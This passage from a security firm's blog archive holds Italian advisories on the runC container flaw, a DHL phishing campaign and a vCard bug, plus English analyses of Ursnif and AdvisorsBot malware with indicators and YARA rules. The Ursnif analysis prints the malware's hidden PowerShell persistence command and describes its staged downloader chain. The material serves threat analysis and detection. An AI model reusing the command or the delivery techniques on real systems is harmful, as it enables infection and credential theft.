  	last_updated = "2019_02_11"
  	tlp = "white"
  	category = "informational"

	strings:
   		 $a = "MZ"
   		 $b = {44 00 02 00 00 00 6A 04 58 6B C0 00 8B 0D}
    		 $c = {00 00 8B 45 0C 8B 55 F8 39 50 0C 74 10 68}
    		 $d = {41 00 FF D6 8B D8 89 5D D4 85 DB 74 74 FF 35}

	condition:
    		 all of them
}

This blog post was authored by Luigi Martire, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB

Importante Vulnerabilità in Tecnologie di Containerizzazione

Proto: N030219.

Con la presente Yoroi desidera informarLa relativamente ad una importante vulnerabilità recentemente scoperta all’interno di molteplici Tecnologie di Containerizzazione, tipicamente utilizzate per la realizzazione di applicazioni moderne in ambienti Cloud ed Enterprise, quali Docker, cri-o, containerd,  LXC, Kubernetes etc.. . La criticità è nota con l’identificativo CVE-2019-5736.

La problematica è originata dalla gestione fallace di alcuni aspetti di sistema legati a link simbolici all’interno del componente “runC” presente nelle famiglie di applicativi affetti, i quali possono permettere ad un attaccante remoto di violare il perimetro di sicurezza ed ottenere accesso al sistema sottostante. Tale condizione può rappresentare rischi di sicurezza nel caso in cui applicazioni vulnerabili siano gestite ed orchestrate tramite queste tecnologie di containerizzazione.

Figura. Esempio di catena di attacco

Vari Produttori di software e sistemi hanno confermato la problematica rilasciando opportuni aggiornamenti di sicurezza, ad esempio, ma non limitato a, RedHat, Debian, Kubernetes, Docker e Novell. A questo proposito, e per via della pubblicazione di dettagli tecnici volti a replicare la criticità, Yoroi consiglia di valutare lo stato di vulnerabilità delle tecnologie di containerizzazione eventualmente in uso presso le Vostre infrastrutture e, qualora necessario, di pianificare l'applicazione delle patch a disposizione.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

WhitePaper: Analisi di Collection #1 nel Panorama Cyber Italiano

Introduzione

Gli ultimi anni sono stati caratterizzati da incrementi sostanziali sia nel numero di attacchi informatici registrati sia nei volumi di malware prodotti da organizzazioni criminali. Questa evoluzione porta al consolidamento un'economia sommersa basata sulla compravendita di credenziali di ignari utenti, sulla realizzazione di Malware adHoc e sull’affitto di criminali informatici. Tale commercio avviene in due principali “territori” denominati ClearNets come per esempio (ma non limitato a): social networks, forum, IRC chats ed Instant Messaging e DarkNets come per esempio (ma non limitato a): Virtual and Private Networks, TOR, Luminati, Hola, freenet etc.

Negli anni, una moltitudine di Organizzazioni sono state obiettivo di attacchi cyber: una parte di essi è andata a buon fine.

I dati di multinazionali, enti governativi, organi di polizia, partiti politici, software house, provider di servizi, case editrici, giornali, associazioni no profit e social networks sono stati trafugati ed utilizzati per alimentare l’economia cyber-criminale, da anni in netta espansione. Molti di questi account, credenziali o accessi sono stati, ad un certo punto della loro storia, venduti o ceduti all’interno di mercati neri e Darknet, dando la possibilità ad altri attaccanti di abusarne, ponendo a rinnovato rischio i milioni di utenti coinvolti nella compromissione di queste entità.

Le organizzazioni coinvolte in questi attacchi non sono solamente organizzazioni internazionali, multinazionali o organizzazioni governative ma numerose sono le aziende Italiane (piccole-medie) che hanno subito la stessa sorte. Basti pensare agli annunci pubblici di “Anonymous Italia”, che nel corso del 2018 hanno scandito nei mesi una compromissione dopo l’altra, esponendo migliaia di utenze su portali appartenenti a PA ed Enti italiani. Compromissioni tali da aver portato alla nascita di un portale dedicato al tracciamento dei data breach unicamente italiani.

A Dicembre 2017 uno dei più noti data breach è stato ...

Per continuare la lettura scarica il WhitePaper Yoroi.

Campagna Malevola “DHL”

Proto: N020219.

Con la presente Yoroi desidera informarLa relativamente ad una campagna di attacco in corso ai danni di numerose Organizzazioni ed utenti di rete italiani. Gli attacchi si manifestano con messaggi di posta fraudolenti che simulano comunicazioni da parte del Corriere Espresso “DHL”. 

All’interno delle email sono allegati archivi compressi contenenti pericolosi script eseguibili che, se aperti dall’utente bersaglio, scaricano ed eseguono una pericolosa variante del Trojan AZORult. Questa minaccia è in grado di trafugare credenziali ed account salvati nel Browser Web e nei Client di Posta in uso, rimanendo silente all’interno della macchina vittima può inoltre installare ulteriori impianti malware nelle fasi successive dell’attacco.

Di seguito si riportano gli indicatori di compromissione individuati durante le analisi:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Ursnif: Long Live the Steganography!

Introduction

Another wave of Ursnif attacks hits Italy.
Ursnif is one of the most active banking trojan. It is also known as GOZI, in fact it is a fork of the original Gozi-ISFB banking Trojan that got its source code leaked in 2014 updating and evolving Gozi features over the years. Also in this variant, Ursnif use weaponized office document with a VBA macro embedded that act as a dropper and multi-stage highly obfuscated powershell scripts in order to hide the real payload. In addition, this Ursnif use also steganography to hide the malicious code and avoid AV detection.

Moreover, this variant uses the QueueUserAPC process injection technique to inject into explorer.exe in a more stealthier way, because no remote threads are created in the target process.

Technical Analysis

The initial infection vector appears as a corrupted Excel file, inviting the user to enable macro execution to properly view the contents of the fake document, typically purchase order, invoice and so on.

Figure 1. Ursnif macro-weaponized document.

Extracting the macro code, shows the malware, in the first instance, checks the victim country using the Application.International MS Office property. If the result corresponds to Italy (code 39), the macro executes the next command using Shell function.

Figure 2. Part of Visual Basic macro code.

The remaining functions of the macro are used to prepare the shell command to launch, concatenating several strings encoded in different ways (mainly in decimal and binary). The resulting command contains a huge binary string, which will be converted into a new Powershell command using the function:

[Convert]::ToInt16() -as[char]

Figure 3. Powershell script deployed by macro code.

As shown in the above figure, the malware tries to download an image from at least one of two embedded URLs:

The apparently legit image actually contains a new Powershell command. The weaponized image is crafted using the Invoke-PSImage script, which allows to embeds the bytes of a script into the pixels of a PNG file.

Figure 4. Powershell script hidden into “Fancy Mario”’s image.

Et voilà, another obfuscated Powershell stage. The payload is encoded in Base64, so it is easy to move on and reveal the next code.

Figure 5. Another stage of deobfuscation process.

Basically, it seems hexadecimal encoded which can be decoded through the previous [Convert]::ToInt16 function.

The final code is:

Figure 6. Powershell script downloading the Ursnif loader.

It executes another check against victim’s country, ensuring it is Italy. The information derives from the command:

Get-Culture | Format-List -Property *

If the check is positive, the script will download an EXE payload from http://fillialopago[.]info/~DF2F63, store it in %TEMP%\Twain001.exe and then execute it.

At the analysis time, the file is not detected by most antiviruses:

Figure 7. Ursnif loader detection rate

Despite its low detection, this executable is a classic Ursnif loader which is responsible to contact the server to download malicious binary which will be injected into explorer.exe process. It uses the function IWebBrowser.Navigate to download data from its malicious server felipllet[.]info with an URI path that looks like a path to a file video (.avi).

Figure 8. IWebBrowser.Navigate function invocation.

The server responds to this request sending encrypted data, as show in the following figure

Figure 9. Part of network traffic containing some encrypted data.

After a decryption routine, all useful data is stored into registry keys at HKCU\Software\AppDataLow\Software\Microsoft\{GUID}.

Figure 10. Registry keys set by the malware.

The regvalue named “defrdisc” (which reminds to a legit Disk Defragmentation Utility) contains the command will be executed as next step and at Windows startup, as displayed below.

Figure 11. Command executed at machine’s startup.

The command’s only goal is to execute the data contained into “cmiftall” regvalue through Powershell engine.

C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E').cmiftall))"

The “cmiftall”’s data is simply a Powershell script encoded in Hexadecimal way, so it is possible to reconstruct its behavior.

Figure 12. Powershell script used to inject the final binary through the APC Injection technique.

So, using the Powershell script stored into regkey (shown above), Ursnif is able to allocate space enough for its malicious byte array, containing the final payload, and to start it as legit process’ thread through QueueUserAPC and SleepEx calls.

The Ursnif’s complete workflow is shown in figure:

Figure 13. Ursnif’s workflow.

Finally, from data contained into last script’s byte array, it is possible to extract a DLL which corresponds to what Ursnif inject into explorer.exe process.

This DLL seems to be corrupted, as stated by some static analysis tools:

Figure 14. Info about the malformed DLL.

However, when it is loaded in memory using APC injection technique, it works with no problems. Submitting the file to VirusTotal, the result is devastating: 0/56 anti-malware detects it.

Figure 15. Final DLL’s detection rate.

Conclusions

As stated first by us in the previous Ursnif analysis in December 2018 and after by Cisco Talos Intelligence in January 2019, also this new Ursnif sample uses the same APC injection technique to instill its final binary into explorer.exe process, along with obfuscation and steganography in order to hide its malicious behaviour. Ursnif is more active and widespread than yesterday, the contacted C2 is not reachable but the malware implant is still alive due to the fact that the crooks are constantly changing their C2 to diverting tracking and analysis.

Yoroi ZLab - Cybaze researchers are continuing the analysis of this undetected DLL in order to extract information and evidences to share with the research community.

Indicators of Compromise

Hashes

Dropurls

C2s

IPs

Artifacts

Yara rules

import "pe"
rule Ursnif_201902 {
meta:
	description = "Yara rule for Ursnif loader - January version"
	author = "Yoroi - ZLab"
	last_updated = "2019-02-06"
	tlp = "white"
	category = "informational"
strings:
	$a1 = "PADDINGXX" 
	$a2 = { 66 66 66 66 66 66 66 }
condition:
	all of ($a*) and pe.number_of_sections == 4 and (pe.version_info["OriginalFilename"] contains "Lumen.exe" or pe.version_info["OriginalFilename"] contains "PropositionReputation.exe")
 }

This blog post was authored by Antonio Farina, Davide Testa and Antonio Pirozzi of Cybaze-Yoroi Z-LAB

Vulnerabilità in vCard Microsoft

Proto: N010219.

Con la presente Yoroi desidera informarLa relativamente ad una vulnerabilità nel gestore contatti VCF di Microsoft Windows, strumento di sistema per la gestione di anagrafiche e business card digitali (vCard).  

La criticità è originata da lacune di validazione nei campi di contatto all’interno dei file vCard ".contact" o “.vcf” che, una volta aperti in lettura, possono permettere la compromissione della macchina bersaglio tramite l’esecuzione di codice arbitrario. Questa vulnerabilità può essere sfruttata in scenari di spear-phishing, nei quali gli attaccanti invitano le potenziali vittime a visionare contatti all’interno di vCard appositamente create.

Al momento il Produttore non ha rilasciato aggiornamenti volti a mitigare la problematica, tuttavia risultano afflitte le versioni Microsoft Windows 10, 8, 7 e Vista.  

Benché non siano ad oggi stati rilevati abusi di questa vulnerabilità da parte di attaccanti, considerata la pubblicazione di dettagli tecnici volti a replicare la criticità e di esempi di utilizzo in simulazioni di attacco, Yoroi suggerisce di informare i Vostri utenti sensibilizzandoli sulla possibilità di ricezione di email inattese contenenti allegati “.contact” o “.vcf” e, qualora non utilizzati, di valutarne il blocco.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

The return of AdvisorsBot

Introduction

In the past days, a new particular sample has been analyzed by the researchers of Cybaze- Yoroi ZLab. As usual, the malware looks like a legitimate e-mail attachment, named as “invoice.doc”. Today, weaponized microsoft office documents with macros, are one of the most common and more effective methods to deliver malware, because they also rely on simple social engineering tricks to lure users to enable them.

The following figure shown a workflow of the infection chain:

Figure 1 - Malware’s workflow

Technical analysis

HashSha 256:a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
ThreatDropper
Briefinvoice(7).doc
ssdeep3072:tg919RZTg8X+H4u7sFYv3Rtf7XZ7PE1MbXEy271G5FZy+1OhV5biqb09H/TrN1Wk:8iqYph1Q5O3

Table 1 -   Dropper information

HashSha 256:62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
Threatpowershell script
Briefokzjtag.png (dropper/payload)
ssdeep192:I6P2ZF0tX6vYhscXNtP++l3p2RwPNtOZE9yHPKR4EJxT/7MZUJn7rW0v:I6P+F4ac3aRwP7d9Ic4EJxT/gZEXWq

Table 2 - Fake PNG, powershell script information

Once opened, the document kindly asks to the users to enable the macro scripts, heavily obfuscated to avoid static detection.

Figure 2 - Document view inviting to enable macro

The macro code downloads a text string through a WebClient object invoked from the powershell console, then it saves it with .png file extension and run it through the “iex” primitive.

Figure 3 - Piece of VBS script that starts malware infection

This script contains different base64 encoded chunks of data, as show in the following figure.

Figure 4 - Piece of code in Base64 encoded inside fake PNG image

The deobfuscation of the first chunk reveals the ip of the C2. This address is the same used to download the whole script.

Figure 5 - Deobfuscated C2’s IP

The second piece of script labeled with “$jdH9C” is a compressed GzipStream object. After its decoding we noticed an executable file is stored within the memory stream:

Figure 6 - DLL hardcoded inside fake PNG script

The analysis of this binary is reported in the next paragraph (see “DLL Analysis”).

The latest base64 chunk is directly executed through “iex” primitive. It’s interesting to notice it calls some “non-library” functions; functions loaded from the previously referenced dll file.

Within this script, we noticed a routine named “nvtTvqn” able to gather information about victim machine.

Figure 7 - System information stealed by malware

It retrieves:

  1. System Info;
  2. Computer IP address;
  3. Network status;
  4. List of running processes;
  5. Available privileges;
  6. Usernames;
  7. Domain Admins;
  8. File on desktop machine;
  9. AntiVirus product on computer.

Other interesting function is “j2aYhH”:

Figure 8 - Accounts and emails stealing

This function searches for all email accounts registered on victim machine. Inside its code another routine named “CR1Z” is references, this one is able to verify the presence of Outlook client installed.

Figure 9 - Register key searched by malware

DLL Analysis

As described in the previous paragraph, the powershell script uses exported function from the executable.

HashSha 256:5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0
ThreatMalware payload containing some malicious function invoked by Powershell script
Brief*.dll file (Payload)
ssdeep96:+8irQu26Iu2X/lZxvXZ31n2G1QmAPuvEHNeSPKw+1sxXt/WxJtMkQRO7j+gqT:+PRoViGOmFvEHNeSCp1sxdumkQbl

Table 3 - DLL information

The file is a dynamic linked library not already known to major security platforms.

Figure 10 - DLL results on Virus Total

The library embeds MSIL code running on top of the .NET framework, so it is quite straightforward to recover its source code.

Figure 11 - Static analysis on DLL

The extracted code contains utility functions used for many purposes: for instance to generate pseudo-random installation path.

Figure 12 - Source code of function in DLL

Instead, the “kaYchi” function accepts three parameters, id, status and post, and creates files with two different extensions: “*.asp” if “post” variable is true and “*.jpg” otherwise.

Figure 13 - Function to generate .asp or .jpg file to write/send victim information to C2

The remote command and control server (162.244.32.180) was down at time of writing. After described steps, malware try to download other components from it and execute them with “iex” primitive

Last DNS activity was in December 2018. This IP is already know at scientific community and labeled as malicious. The IP is located in US how visible in the following figures.

Figure 14 - previous DNS of C2
Figure 15 - C2’s relation graph

The domain zosmogroel.com was active until 18-12-2018 we also found an associated certificate with the SHA-1 signature 98b637715fa6429a60eed9b58447e967bf7e1018

Figure 16 - zosmogroel.com certificate

This signature was associated with more than 80 IP addresses, further analysis reveals that those ips reveal how some of them have been used as dropurls for other malware samples.

The analyzed sample is AdvisorsBot, first analyzed by Proofpoint on 23 August 2018, we also found evidences on a public sandbox that the 162.244.32.180 remote C2 on last August deliver a Ursnif/Gozi Variant 162.244.32.180/yak0810.exe with the following sha256 030531a784f72f145bef98a3240283da88fe623904c066be179fbbe3a9150c48

as also confirmed by signatures on VT. This last evidence may suggest that this infrastructure was used to deliver different malware.

Conclusions

Weaponized Microsoft Office documents delivered via email represent the top infection vector in today malware landscape, at the second place we found the abusing of Microsoft DDE protocol  with CVE-2017-11882. One reason is that, very often, macro malware does not rely on most-expensive-to-deploy 0-day exploit  and could bypass end-point security solution (macro are often whitelisted in enterprise environment) due to extensive utilization of multi-layered obfuscation mainly in powershell, broadly speaking with a very low barrier-to-entry.

Several APT’s today  are using spear-phishing mail with weaponized office document as an attachment, just to name few ones OilRIG APT have used BondUpdated in a campaign discovered by Fireeye in 2017 targeted a different Middle Eastern governmental organization with a malicious VBA macro that download a 2-stage powershell.

Similar vector was used in recents APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) The attackers didn’t use any zero-day vulnerabilities in this campaign, instead, they relied on weaponized Office documents containing VBA scripts used to deliver a new variant of Seduploader. Also TURLA APT use weaponized document in their recent campaigns to deliver KopiLuwak with heavily obfuscated Javascript payload.

This sample show an high level of obfuscation to defeat AV and does not use any exploit, in fact, the obfuscated DLL component was not flagged by VT(0/60) at the time of writing. Unfortunately we can not carry on the analysis because the C2 is not reachable yet, but we noticed that last DNS activity was in December 2018 with the registration of 2 distinct domains active for 1 week each one (and several domains before), assuming that, this malware was developed to be used in target-specific activities tightening the time window to a minimum each time. Further analysis on these registered domains suggest us that the whole infrastructure used is big enough (88 IP’s founded) and it may have also been used to deliver other malware.

Researcher of Cybaze-Yoroi ZLAB advice to disable macros by default and check the origin of the email in depth.

Indicator of Compromise

Yara rules

rule ps_dropper_29_01_2019{

	meta:
  	description = "Yara Rule for ps_dropper"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_01_29"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = "nubiunddd"
    		$b = {40 03 92 DA 05 60 CE 13 38}
   		$c = {81 42 2A 08 43 4A 1C 00}
    		$d = {D0 CF}

	condition:
    	all of them
}


rule extracted_dll_29_01_2019{

	meta:
  	description = "Yara Rule for extracted_dll"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_01_29"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = {4D 5A}
    		$b = {61 00 73 00 70 00 00 09 2E 00 6A 00 70 00 67}
   		$c = "tools.dll"
   		$d = {54 43 77 77 00 6A 79 35}

	condition:
    	all of them
}

rule image_script_29_01_2019{

	meta:
  	description = "Yara Rule for image_script"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_01_29"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = "MTYyLjI0NC4zMi4xODA="
    		$b = "oiiTPUErt"
   		$c = "iQ2xpZW50KSVc"
   		$d = "$sIS8cqNJ13x"

	condition:
    	$a or $d or $b and $c  
}

This blog post was authored by Davide Testa, Luigi Martire, Antonio Farina and Antonio Pirozzi of Cybaze-Yoroi Z-LAB